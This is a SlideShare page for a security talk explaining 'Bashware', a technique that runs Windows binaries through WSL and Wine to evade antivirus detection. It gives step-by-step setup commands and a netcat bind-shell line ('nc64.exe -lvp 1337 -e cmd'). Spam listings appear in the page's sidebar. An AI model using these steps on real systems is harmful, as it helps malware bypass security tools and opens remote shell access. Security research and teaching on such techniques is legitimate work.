SlideShare a Scribd company logo
Bashware
A malware execution technique
/usr/bin/who
• null and OWASP Bangalore chapter leader
• A decade of security experience in various technologies
• Security researcher and evangelist
• Speaker and trainer at several security conferences
• https://ibreak.software
• @riyazwalikar | @wincmdfu
What is Bashware?
• A technique researched by Check Point Security that can be used by
malware to run using the Windows Subsystem for Linux (WSL) and
not be detected by security solutions (like AV etc.)
• Basically a way to run PE executables using the WSL
• Bash + (mal)ware
Back to Basics
• How does malware (pick any) infect a Windows machine?
• How is it detected? Any examples of detection techniques?
An overview of WSL
• WSL is a collection of components that enables native Linux ELF64
binaries to run on Windows. It contains both user mode and kernel
mode components. It is primarily comprised of:
• User mode session manager service that handles the Linux instance life cycle
• Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by
translating Linux syscalls
• Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
Demo of WSL
Bashware Video Demo
• https://www.youtube.com/watch?v=fwEQFMbHIV8
Let’s build a PoC!
According to the video/blogpost
• Enable WSL
• Enable Developer mode
• Install Linux components
• Install WineHQ
• Run Windows binary through Wine
Step 1: Enable WSL
dism /Online /Enable-Feature /All /FeatureName:Microsoft-
Windows-Subsystem-Linux /NoRestart
Enable-WindowsOptionalFeature -O -F Microsoft-Windows-
Subsystem-Linux
Step 2: Enable Developer mode
• Set the following registry values
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock]
"AllowAllTrustedApps"=dword:1
"AllowDevelopmentWithoutDevLicense"=dword:1
Executing Windows Malware through WSL (Bashware)
Step 3: Install Linux components
• lxrun /install /y
Step 4: Install Wine
dpkg --add-architecture i386
add-apt-repository -y ppa:ubuntu-wine/ppa
apt-get update
apt-get install wine1.6-amd64
Step 5: Run PE binary using wine
wine64 nc64.exe -lvp 1337 -e cmd
Demo
• Riyaz Walikar
• https://ibreak.software
• @riyazwalikar | @wincmdfu
References
• https://research.checkpoint.com/beware-bashware-new-method-
malware-bypass-security-solutions/
• https://www.youtube.com/watch?v=fwEQFMbHIV8
• https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows-
subsystem-for-linux-overview/
• https://ibreak.software/executing-windows-malware-in-windows-
subsystem-for-linux-bashware/

More Related Content

What's hot

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
Jameel Nabbo
 
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemFrom zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows system
Nabeel Ahmed
 
Using symfony to save time, effort and sanity
Using symfony to save time, effort and sanityUsing symfony to save time, effort and sanity
Using symfony to save time, effort and sanity
Joshua May
 
J+s
J+sJ+s
J+s
happyuk
 
WIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationWIndows Kernel-Land exploitation
WIndows Kernel-Land exploitation
kyaw thiha
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Peter Hlavaty
 
Device drivers Introduction
Device drivers IntroductionDevice drivers Introduction
Device drivers Introduction
vijay selva
 
Hosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLHosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSL
OSU Open Source Lab
 
Day 2 Dns Cert 4c Malicious Use
Day 2   Dns Cert 4c Malicious UseDay 2   Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious Use
vngundi
 
PowerShell 2.0 remoting
PowerShell 2.0 remotingPowerShell 2.0 remoting
PowerShell 2.0 remoting
Ravikanth Chaganti
 
Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land
Ahmed El-Arabawy
 
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsIntroduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interrupts
Shivam Mitra
 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflows
Sandun Perera
 
Gnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semGnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-sem
Sagun Baijal
 
Embedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandEmbedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS Land
Ahmed El-Arabawy
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
Shubham Mittal
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
Jérôme Petazzoni
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
Peter Hlavaty
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmware
Amit Serper
 

What's hot (20)

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows systemFrom zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows system
 
Using symfony to save time, effort and sanity
Using symfony to save time, effort and sanityUsing symfony to save time, effort and sanity
Using symfony to save time, effort and sanity
 
J+s
J+sJ+s
J+s
 
WIndows Kernel-Land exploitation
WIndows Kernel-Land exploitationWIndows Kernel-Land exploitation
WIndows Kernel-Land exploitation
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 
Device drivers Introduction
Device drivers IntroductionDevice drivers Introduction
Device drivers Introduction
 
Hosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSLHosting Open Source Projects at the OSUOSL
Hosting Open Source Projects at the OSUOSL
 
Day 2 Dns Cert 4c Malicious Use
Day 2   Dns Cert 4c Malicious UseDay 2   Dns Cert 4c Malicious Use
Day 2 Dns Cert 4c Malicious Use
 
PowerShell 2.0 remoting
PowerShell 2.0 remotingPowerShell 2.0 remoting
PowerShell 2.0 remoting
 
Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land Course 101: Lecture 4: A Tour in RTOS Land
Course 101: Lecture 4: A Tour in RTOS Land
 
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interruptsIntroduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interrupts
 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflows
 
Gnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-semGnubs-pres-foss-cdac-sem
Gnubs-pres-foss-cdac-sem
 
Embedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS LandEmbedded Systems: Lecture 5: A Tour in RTOS Land
Embedded Systems: Lecture 5: A Tour in RTOS Land
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
How *NOT* to firmware
How *NOT* to firmwareHow *NOT* to firmware
How *NOT* to firmware
 

Similar to Executing Windows Malware through WSL (Bashware)

Linux Server Security and Hardering
Linux Server Security and HarderingLinux Server Security and Hardering
Linux Server Security and Hardering
vidalinux
 
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfWhat Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdf
Bytecode Security
 
Kali presentation
Kali presentationKali presentation
Kali presentation
Zain Ul abadin
 
VCS, Containers & Low-code
VCS, Containers & Low-codeVCS, Containers & Low-code
VCS, Containers & Low-code
Joel Quintyn
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
Linux for embedded_systems
Linux for embedded_systemsLinux for embedded_systems
Linux for embedded_systems
Vandana Salve
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Neel Pathak
 
Linux
LinuxLinux
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
Kangaroot
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.be
Mandi Walls
 
1 artem mygaiev - testing open-source software in embedded devices
1   artem mygaiev - testing open-source software in embedded devices1   artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices
Ievgenii Katsan
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Sysdig
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
isc2-hellenic
 
Version Control and Continuous Integration
Version Control and Continuous IntegrationVersion Control and Continuous Integration
Version Control and Continuous Integration
Geff Henderson Chang
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
drewz lin
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
MichaelM85042
 
WTF my container just spawned a shell!
WTF my container just spawned a shell!WTF my container just spawned a shell!
WTF my container just spawned a shell!
Sysdig
 
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B KuteUnit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Tushar B Kute
 
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privilegesLinx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
AliBawazeEer
 
Overview on Open Source Technology.pptx
Overview on Open Source Technology.pptxOverview on Open Source Technology.pptx
Overview on Open Source Technology.pptx
DrRShaliniVISTAS
 

Similar to Executing Windows Malware through WSL (Bashware) (20)

Linux Server Security and Hardering
Linux Server Security and HarderingLinux Server Security and Hardering
Linux Server Security and Hardering
 
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdfWhat Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdf
 
Kali presentation
Kali presentationKali presentation
Kali presentation
 
VCS, Containers & Low-code
VCS, Containers & Low-codeVCS, Containers & Low-code
VCS, Containers & Low-code
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Linux for embedded_systems
Linux for embedded_systemsLinux for embedded_systems
Linux for embedded_systems
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Linux
LinuxLinux
Linux
 
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
 
InSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.beInSpec - June 2018 at Open28.be
InSpec - June 2018 at Open28.be
 
1 artem mygaiev - testing open-source software in embedded devices
1   artem mygaiev - testing open-source software in embedded devices1   artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
 
Version Control and Continuous Integration
Version Control and Continuous IntegrationVersion Control and Continuous Integration
Version Control and Continuous Integration
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 
WTF my container just spawned a shell!
WTF my container just spawned a shell!WTF my container just spawned a shell!
WTF my container just spawned a shell!
 
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B KuteUnit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
 
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privilegesLinx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
 
Overview on Open Source Technology.pptx
Overview on Open Source Technology.pptxOverview on Open Source Technology.pptx
Overview on Open Source Technology.pptx
 

Recently uploaded

Introduction to Cloud computing for Internet of Things
Introduction to Cloud computing for Internet of ThingsIntroduction to Cloud computing for Internet of Things
Introduction to Cloud computing for Internet of Things
NachuSubramanian1
 
To Avoid Mistakes When Using Online Attendance Sheets
To Avoid Mistakes When Using Online Attendance SheetsTo Avoid Mistakes When Using Online Attendance Sheets
To Avoid Mistakes When Using Online Attendance Sheets
Task Tracker
 
11 Top Cross Browser Testing Tools to Know About.pdf
11 Top Cross Browser Testing Tools to Know About.pdf11 Top Cross Browser Testing Tools to Know About.pdf
11 Top Cross Browser Testing Tools to Know About.pdf
kalichargn70th171
 
Google ML-Kit - Understanding on-device machine learning
Google ML-Kit - Understanding on-device machine learningGoogle ML-Kit - Understanding on-device machine learning
Google ML-Kit - Understanding on-device machine learning
VishrutGoyani1
 
Prada Group Reports Strong Growth in First Quarter …
Prada Group Reports Strong Growth in First Quarter …Prada Group Reports Strong Growth in First Quarter …
Prada Group Reports Strong Growth in First Quarter …
908dutch
 
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
OnePlan Solutions
 
當測試開始左移
當測試開始左移當測試開始左移
當測試開始左移
Jersey (CHE-PING) Su
 
React Native vs Flutter - SSTech System
React Native vs Flutter  - SSTech SystemReact Native vs Flutter  - SSTech System
React Native vs Flutter - SSTech System
SSTech System
 
Il Data Streaming per un’AI real-time di nuova generazione
Il Data Streaming per un’AI real-time di nuova generazioneIl Data Streaming per un’AI real-time di nuova generazione
Il Data Streaming per un’AI real-time di nuova generazione
confluent
 
welcome to presentation on Google Apps
welcome to   presentation on Google Appswelcome to   presentation on Google Apps
welcome to presentation on Google Apps
AsifKarimJim
 
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
ashiklo9823
 
🚂🚘 Premium Girls Call Ranchi 🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
🚂🚘 Premium Girls Call Ranchi  🛵🚡000XX00000 💃 Choose Best And Top Girl Service...🚂🚘 Premium Girls Call Ranchi  🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
🚂🚘 Premium Girls Call Ranchi 🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
bahubalikumar09988
 
Odoo E-commerce website development guides
Odoo E-commerce website development guidesOdoo E-commerce website development guides
Odoo E-commerce website development guides
jhkdigitalmarketing
 
ThaiPy meetup - Indexes and Django
ThaiPy meetup - Indexes and DjangoThaiPy meetup - Indexes and Django
ThaiPy meetup - Indexes and Django
akshesh doshi
 
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
87tomato
 
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
shanihomely
 
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in CityGirls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
neshakor5152
 
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdfIoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
mohitd6
 
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
revolutionary575
 
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
ThousandEyes
 

Recently uploaded (20)

Introduction to Cloud computing for Internet of Things
Introduction to Cloud computing for Internet of ThingsIntroduction to Cloud computing for Internet of Things
Introduction to Cloud computing for Internet of Things
 
To Avoid Mistakes When Using Online Attendance Sheets
To Avoid Mistakes When Using Online Attendance SheetsTo Avoid Mistakes When Using Online Attendance Sheets
To Avoid Mistakes When Using Online Attendance Sheets
 
11 Top Cross Browser Testing Tools to Know About.pdf
11 Top Cross Browser Testing Tools to Know About.pdf11 Top Cross Browser Testing Tools to Know About.pdf
11 Top Cross Browser Testing Tools to Know About.pdf
 
Google ML-Kit - Understanding on-device machine learning
Google ML-Kit - Understanding on-device machine learningGoogle ML-Kit - Understanding on-device machine learning
Google ML-Kit - Understanding on-device machine learning
 
Prada Group Reports Strong Growth in First Quarter …
Prada Group Reports Strong Growth in First Quarter …Prada Group Reports Strong Growth in First Quarter …
Prada Group Reports Strong Growth in First Quarter …
 
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
Maximizing Efficiency and Profitability: Optimizing Data Systems, Enhancing C...
 
當測試開始左移
當測試開始左移當測試開始左移
當測試開始左移
 
React Native vs Flutter - SSTech System
React Native vs Flutter  - SSTech SystemReact Native vs Flutter  - SSTech System
React Native vs Flutter - SSTech System
 
Il Data Streaming per un’AI real-time di nuova generazione
Il Data Streaming per un’AI real-time di nuova generazioneIl Data Streaming per un’AI real-time di nuova generazione
Il Data Streaming per un’AI real-time di nuova generazione
 
welcome to presentation on Google Apps
welcome to   presentation on Google Appswelcome to   presentation on Google Apps
welcome to presentation on Google Apps
 
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
Vip Girls Call ServiCe Hyderabad 0000000000 Pooja Best High Class Hyderabad A...
 
🚂🚘 Premium Girls Call Ranchi 🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
🚂🚘 Premium Girls Call Ranchi  🛵🚡000XX00000 💃 Choose Best And Top Girl Service...🚂🚘 Premium Girls Call Ranchi  🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
🚂🚘 Premium Girls Call Ranchi 🛵🚡000XX00000 💃 Choose Best And Top Girl Service...
 
Odoo E-commerce website development guides
Odoo E-commerce website development guidesOdoo E-commerce website development guides
Odoo E-commerce website development guides
 
ThaiPy meetup - Indexes and Django
ThaiPy meetup - Indexes and DjangoThaiPy meetup - Indexes and Django
ThaiPy meetup - Indexes and Django
 
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
Verified Girls Call Mumbai 👀 9820252231 👀 Cash Payment With Room DeliveryDeli...
 
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
Russian Girls Call Mumbai 🎈🔥9930687706 🔥💋🎈 Provide Best And Top Girl Service ...
 
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in CityGirls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
Girls Call Mysore 000XX00000 Provide Best And Top Girl Service And No1 in City
 
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdfIoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
IoT In Manufacturing_ Use Cases, Benefits, and Challenges.pdf
 
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
Busty Girls Call Mumbai 9930245274 Unlimited Short Providing Girls Service Av...
 
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
Cisco Live Announcements: New ThousandEyes Release Highlights - July 2024
 

Executing Windows Malware through WSL (Bashware)

  • 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
  • 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
  • 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
  • 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  • 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
  • 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
  • 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
  • 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
  • 13. Step 3: Install Linux components • lxrun /install /y
  • 14. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
  • 15. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
  • 16. Demo
  • 17. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
  • 18. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/